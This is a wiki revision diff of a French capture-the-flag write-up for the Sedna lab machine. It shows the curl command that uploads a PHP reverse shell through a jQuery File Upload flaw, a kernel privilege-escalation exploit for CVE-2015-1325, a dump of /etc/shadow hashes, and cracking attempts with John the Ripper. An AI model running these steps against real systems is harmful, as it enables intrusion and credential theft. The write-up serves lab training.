Ci-dessous, les différences entre deux révisions de la page.
vm:sedna [2017/03/22 09:54] arkinar créée |
vm:sedna [2017/03/22 12:42] (Version actuelle) arkinar |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
**Sedna - Write Up** | **Sedna - Write Up** | ||
+ | __Reconnaissance__ | ||
<code BASH> | <code BASH> | ||
Ligne 21: | Ligne 22: | ||
Après quelques essais on remarque : | Après quelques essais on remarque : | ||
- | - Tomcat n'utilise pas d'identifiants simple à deviner | + | - Tomcat n'utilise pas d'identifiants simple à deviner |
- | - Il n'y a pas d'exploit pour rpcbind et bind 9 | + | - Il n'y a pas d'exploit pour rpcbind et bind 9 |
+ | __Exploitation Web__ | ||
Pour le port 80 : | Pour le port 80 : | ||
Ligne 70: | Ligne 72: | ||
Dirb nous ressort tout un tas de dossier à aller visiter. | Dirb nous ressort tout un tas de dossier à aller visiter. | ||
- | Dans le dossier "themes" on trouve un dashboard et en regardant le code source du dashboard on voit : | + | Dans le dossier "themes" on trouve un dashboard. |
+ | |||
+ | En regardant le code source du dashboard on voit : | ||
<file HTML dashboard_index.html> | <file HTML dashboard_index.html> | ||
Ligne 107: | Ligne 111: | ||
L'url vulnérable est la suivante : | L'url vulnérable est la suivante : | ||
<code> | <code> | ||
- | http://192.168.43.168/themes/dashboard/assets/plugins/jquery-file-upload/server/php/ | + | http://192.168.43.43/themes/dashboard/assets/plugins/jquery-file-upload/server/php/ |
</code> | </code> | ||
Ligne 119: | Ligne 123: | ||
<code BASH> | <code BASH> | ||
- | curl -i -X POST -H "Content-Type: multipart/form-data" -F "files=@php-reverse-shell.php" http://192.168.43.168/themes/dashboard/assets/plugins/jquery-file-upload/server/php/ | + | curl -i -X POST -H "Content-Type: multipart/form-data" -F "files=@php-reverse-shell.php" http://192.168.43.43/themes/dashboard/assets/plugins/jquery-file-upload/server/php/ |
</code> | </code> | ||
- | Mon fichier une fois uploader est situé : | + | Mon fichier une fois uploadé est situé : |
<code> | <code> | ||
http://192.168.43.168/files/php-reverse-shell.php | http://192.168.43.168/files/php-reverse-shell.php | ||
Ligne 134: | Ligne 138: | ||
{{ :vm:nc.png?nolink |}} | {{ :vm:nc.png?nolink |}} | ||
+ | |||
+ | __Exploitation du système & Élévation de privilèges__ | ||
On va chercher la version du kernel : | On va chercher la version du kernel : | ||
Ligne 170: | Ligne 176: | ||
[[https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/37088.c]] | [[https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/37088.c]] | ||
- | il est basé sur la CVE-2015-1325 et à été testé sur la version 14.04 d'Ubuntu. | + | Il est basé sur la CVE-2015-1325 et à été testé sur la version 14.04 d'Ubuntu. |
- | on récupère l'exploit sur la machine (j'ai choisi le de dossier /var/www/html car accessible en écriture). | + | On récupère l'exploit sur la machine (j'ai choisi le dossier /var/www/html car il est accessible en écriture). |
<code BASH> | <code BASH> | ||
Ligne 219: | Ligne 225: | ||
a10828bee17db751de4b936614558305 | a10828bee17db751de4b936614558305 | ||
</code> | </code> | ||
+ | |||
+ | __Pour aller plus loin__ | ||
On va chercher les identifiants du tomcat : | On va chercher les identifiants du tomcat : | ||
Ligne 232: | Ligne 240: | ||
On récupère les /etc/shadow et /etc/passwd | On récupère les /etc/shadow et /etc/passwd | ||
+ | |||
+ | <file shadow> | ||
+ | root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7::: | ||
+ | crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7::: | ||
+ | </file> | ||
+ | |||
+ | <file passwd> | ||
+ | root:x:0:0:root:/root:/bin/bash | ||
+ | crackmeforpoints:x:1000:1000::/home/crackmeforpoints: | ||
+ | </file> | ||
+ | |||
+ | Utilisation de l'outil unshadow de la suite John The Ripper : | ||
+ | |||
+ | <code BASH> | ||
+ | ./unshadow passwd shadow > hash_a_crack | ||
+ | </code> | ||
+ | |||
+ | Tentative de casser les hash avec john : | ||
+ | <code BASH> | ||
+ | ./john hash_a_crack | ||
+ | </code> | ||
+ | |||
+ | Les mots de passes n'ont pas été trouvés dans un délais 20 minutes de crack. | ||
+ | |||
+ | L'exploitation de la machine c'est finit à ce niveau là. | ||
+ | |||
+ | Merci à l'auteur de la machine. |